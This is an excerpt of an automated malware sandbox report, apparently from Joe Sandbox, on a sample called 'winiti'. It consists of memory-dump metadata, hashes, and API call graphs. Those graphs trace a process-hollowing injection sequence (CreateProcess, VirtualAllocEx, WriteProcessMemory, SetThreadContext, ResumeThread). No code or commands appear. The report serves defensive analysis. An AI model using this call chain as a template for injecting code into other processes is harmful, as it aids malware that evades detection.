                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: d96562d04ace6f61177b2152f982a708773959c281fa1a92b79fe3450d63701e
                          • Instruction ID: b4990eb26e114d93fe9ea27131880549f15b91b2af0eee5719f463912b388985
                          • Opcode Fuzzy Hash: d96562d04ace6f61177b2152f982a708773959c281fa1a92b79fe3450d63701e
                          • Instruction Fuzzy Hash: 13C10571D002598FDB25CFA8C841BEEBBF1FB09300F0495AAD819B7251EB749A85CF95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00BD3DAF
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: e0c47e203284fd9c82bd5285cd82ac29372f830397351ac3e3d0b6e258651c2b
                          • Instruction ID: 2f7f7da8ea82fb3c8d4391ea83de22f31c8d9e7fb095b2c0b0d0e7a800e1183e
                          • Opcode Fuzzy Hash: e0c47e203284fd9c82bd5285cd82ac29372f830397351ac3e3d0b6e258651c2b
                          • Instruction Fuzzy Hash: 71C10471D002198FDB25CFA8C841BEEBBF1FB09300F0495AAD819B7251EB749A85CF95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1157 bd3748-bd37bb 1159 bd37bd-bd37cf 1157->1159 1160 bd37d2-bd3839 WriteProcessMemory 1157->1160 1159->1160 1162 bd383b-bd3841 1160->1162 1163 bd3842-bd3894 1160->1163 1162->1163
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00BD3823
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: e49de722e56c516e3bb4fadaddf75eba5341713275ad6e900dc569b89a3be740
                          • Instruction ID: c2698ce07ae33832cae355aedd734cc5b6c5412e899b9ec3011f74736ef809c0
                          • Opcode Fuzzy Hash: e49de722e56c516e3bb4fadaddf75eba5341713275ad6e900dc569b89a3be740
                          • Instruction Fuzzy Hash: 4041A9B9D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250D335AA45CF64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1168 bd3750-bd37bb 1170 bd37bd-bd37cf 1168->1170 1171 bd37d2-bd3839 WriteProcessMemory 1168->1171 1170->1171 1173 bd383b-bd3841 1171->1173 1174 bd3842-bd3894 1171->1174 1173->1174
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00BD3823
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: e7e7747b0536a60afe9b4caed47ece61e955f11b00d4c31be897b98ff30b5c6e
                          • Instruction ID: 935211ada51e8cb83640ebb1c23c0e0db35b208edaa5cb66e1e7eeab771ca97b
                          • Opcode Fuzzy Hash: e7e7747b0536a60afe9b4caed47ece61e955f11b00d4c31be897b98ff30b5c6e
                          • Instruction Fuzzy Hash: 5C41A8B5D012489FCF00CFA9D984AEEFBF1BB49314F20942AE818B7210D335AA45CF64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1179 bd38aa-bd3978 ReadProcessMemory 1182 bd397a-bd3980 1179->1182 1183 bd3981-bd39d3 1179->1183 1182->1183
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00BD3962
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 308d4e90e842811f2d1598558b216e34e912a08d5052a94fff49b855fdb7e6a5
                          • Instruction ID: f4a071ab277a186d2de2789929522d797d5ac427111e0bca46335c3711b05b7b
                          • Opcode Fuzzy Hash: 308d4e90e842811f2d1598558b216e34e912a08d5052a94fff49b855fdb7e6a5
                          • Instruction Fuzzy Hash: 1A41AAB5D042589FCF10CFA9D984AEEFBB1BB49314F20942AE815B7200D374A945CF65

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1188 bd38b0-bd3978 ReadProcessMemory 1191 bd397a-bd3980 1188->1191 1192 bd3981-bd39d3 1188->1192 1191->1192
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00BD3962
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 2de8d2a4aeae67d3be9120520a694d7acd828cbf381b7231da367f6f3c02589d
                          • Instruction ID: 0f1523d8e2e7eee6d6ad2b0387f9abb6fd622225c05cca06c6d0208e53b0219e
                          • Opcode Fuzzy Hash: 2de8d2a4aeae67d3be9120520a694d7acd828cbf381b7231da367f6f3c02589d
                          • Instruction Fuzzy Hash: 824199B5D002589FCF10CFA9D984AEEFBB1BB49310F10942AE815B7300D779AA45CF65

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1197 bd3622-bd36e8 VirtualAllocEx 1200 bd36ea-bd36f0 1197->1200 1201 bd36f1-bd373b 1197->1201 1200->1201
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00BD36D2
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 5e269676f89fd63c9a2b9c298993c23b74b67c7f0b28fe665b6cada1be8f96ca
                          • Instruction ID: 56a4269cce4d5b6b5ce9d24fa47ba30a6e38c06f9924b4ad6bae27b71596da30
                          • Opcode Fuzzy Hash: 5e269676f89fd63c9a2b9c298993c23b74b67c7f0b28fe665b6cada1be8f96ca
                          • Instruction Fuzzy Hash: 6E41AAB9D042589FCF10CFA9D980AEEFBB1AB49314F10942AE815B7310D735A905CF55

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1206 bd3628-bd36e8 VirtualAllocEx 1209 bd36ea-bd36f0 1206->1209 1210 bd36f1-bd373b 1206->1210 1209->1210
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00BD36D2
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: fd85b3f0ddf9ffda95d5b5d19df342f5142d79025b70a4952c4381496631cded
                          • Instruction ID: 8d4cc996a2b4a4b02cf6c933739d1167ae24f4677f0388c100057c59803c951a
                          • Opcode Fuzzy Hash: fd85b3f0ddf9ffda95d5b5d19df342f5142d79025b70a4952c4381496631cded
                          • Instruction Fuzzy Hash: 154199B9D002589BCF10CFA9D984AEEFBB5AB49310F10942AE814B7310D735A945CF65

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1215 bd34f2-bd3558 1217 bd356f-bd35bd Wow64SetThreadContext 1215->1217 1218 bd355a-bd356c 1215->1218 1220 bd35bf-bd35c5 1217->1220 1221 bd35c6-bd3612 1217->1221 1218->1217 1220->1221
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00BD35A7
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 0cf4fe46b093b1c8dd4eadbc6046aa2447e84d105abffa1760ff41a0a0a0ada7
                          • Instruction ID: b52e33c74a0fa0cc2ca16a9744dba276dcdbf233dc44bbe3fe8971910139fcf2
                          • Opcode Fuzzy Hash: 0cf4fe46b093b1c8dd4eadbc6046aa2447e84d105abffa1760ff41a0a0a0ada7
                          • Instruction Fuzzy Hash: AF41BBB5D012589FCB10CFA9D984AEEFBF1AB49314F24842AE415B7240D738AA49CF54
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00BD35A7
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 008fc870e6066abc7ffb44f09ea910ce94e181ca2bd076fdae19cc8485467db7
                          • Instruction ID: 5d15afe68753720a49be6402fcebaebc32275e0f3dbc3ae8816ec120bdda7b2d
                          • Opcode Fuzzy Hash: 008fc870e6066abc7ffb44f09ea910ce94e181ca2bd076fdae19cc8485467db7
                          • Instruction Fuzzy Hash: C741ACB5D002589FCB10CFAAD984AEEFBF1AB49314F24842AE414B7344D738AA45CF54
                          APIs
                          • ResumeThread.KERNELBASE(?), ref: 00BD3486
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          APIs
                          • ResumeThread.KERNELBASE(?), ref: 00BD3486
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: r
                          • API String ID: 0-1812594589
                          • Instruction ID: d77be8c75583d25366eb4cd47db11641a6e1921b4bad7236317f972f2b9abb69
                          • Opcode Fuzzy Hash: f9551024ad3065a3ddc6b052437955e0d7f5bf7b53709cddb4a6df9d7ca3e047
                          • Instruction Fuzzy Hash: FFC0123093D244CFC7218B60C814AAC7B75BB0A340B70820E9026A3612CB601810EF01
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 66051a8435a70d58aa983645fecbdd3e6aec4b4df0f1291bd332fdb23b5a08ce
                          • Instruction ID: 292f189096cc8bf756c7303419482970472282b7ba07ca00bd06d53be666163e
                          • Opcode Fuzzy Hash: 66051a8435a70d58aa983645fecbdd3e6aec4b4df0f1291bd332fdb23b5a08ce
                          • Instruction Fuzzy Hash: F2C09BD15496C05FD3019664C8757407F607F61206F0541DDD455471D3D7056616DB51
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e734822a254406c8f4f9e1046bd18d0c2b3865e04a71568064425073bae4a499
                          • Instruction ID: b235cfbf38cc6cc30b609b2d6009170632c34c0b61016b90f6c9fd24ebf5161b
                          • Opcode Fuzzy Hash: e734822a254406c8f4f9e1046bd18d0c2b3865e04a71568064425073bae4a499
                          • Instruction Fuzzy Hash: 02C04C34D28104DFC730CB60D554AAC7775BB0D341F70421D902653512C7605451DF40
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'p
                          • API String ID: 0-481844870
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:

                          Execution Graph

                          Execution Coverage:0.9%
                          Dynamic/Decrypted Code Coverage:4.1%
                          Signature Coverage:7.2%
                          Total number of Nodes:97
                          Total number of Limit Nodes:8

                          Control-flow Graph

                          control_flow_graph 266 417a03-417a2c call 42ecc3 269 417a32-417a40 call 42f203 266->269 270 417a2e-417a31 266->270 273 417a50-417a61 call 42d663 269->273 274 417a42-417a4d call 42f4a3 269->274 279 417a63-417a77 LdrLoadDll 273->279 280 417a7a-417a7d 273->280 274->273 279->280
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                          Memory Dump Source
                          • Source File: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0

                          Control-flow Graph

                          control_flow_graph 293 42bee3-42bf1c call 404703 call 42d153 NtClose
                          APIs
                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BF17
                          Memory Dump Source
                          • Source File: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0

                          Control-flow Graph

                          control_flow_graph 303 8df9f0-8dfa05 LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0

                          Control-flow Graph

                          control_flow_graph 304 8dfae8-8dfafd LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0

                          Control-flow Graph

                          control_flow_graph 305 8dfb68-8dfb7d LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0

                          Control-flow Graph

                          control_flow_graph 205 42c263-42c2a7 call 404703 call 42d153 RtlFreeHeap
                          APIs
                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C2A2
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID: ^gA
                          • API String ID: 3298025750-2986628814

                          Control-flow Graph

                          control_flow_graph 253 417a83-417aa0 254 417a32-417a40 call 42f203 253->254 255 417aa2-417aa4 253->255 258 417a50-417a61 call 42d663 254->258 259 417a42-417a4d call 42f4a3 254->259 264 417a63-417a77 LdrLoadDll 258->264 265 417a7a-417a7d 258->265 259->258 264->265
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                          Memory Dump Source
                          • Source File: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0

                          Control-flow Graph

                          control_flow_graph 281 417aa5-417ab0 282 417ab2-417abb 281->282 283 417a58-417a61 281->283 286 417aa2-417aa4 282->286 287 417abd-417ac6 282->287 284 417a63-417a77 LdrLoadDll 283->284 285 417a7a-417a7d 283->285 284->285
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                          Memory Dump Source
                          • Source File: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0

                          Control-flow Graph

                          control_flow_graph 288 42c213-42c254 call 404703 call 42d153 RtlAllocateHeap
                          APIs
                          • RtlAllocateHeap.NTDLL(?,0041E3BE,?,?,00000000,?,0041E3BE,?,?,?), ref: 0042C24F
                          Memory Dump Source
                          • Source File: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0

                          Control-flow Graph

                          control_flow_graph 298 42c2b3-42c2ec call 404703 call 42d153 ExitProcess
                          APIs
                          • ExitProcess.KERNELBASE(?), ref: 0042C2E7
                          Memory Dump Source
                          • Source File: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID:
                          • API String ID: 621844428-0
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: [Pj
                          • API String ID: 0-2289356113
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                          • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                          • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                          • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                          • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                          • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                          • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
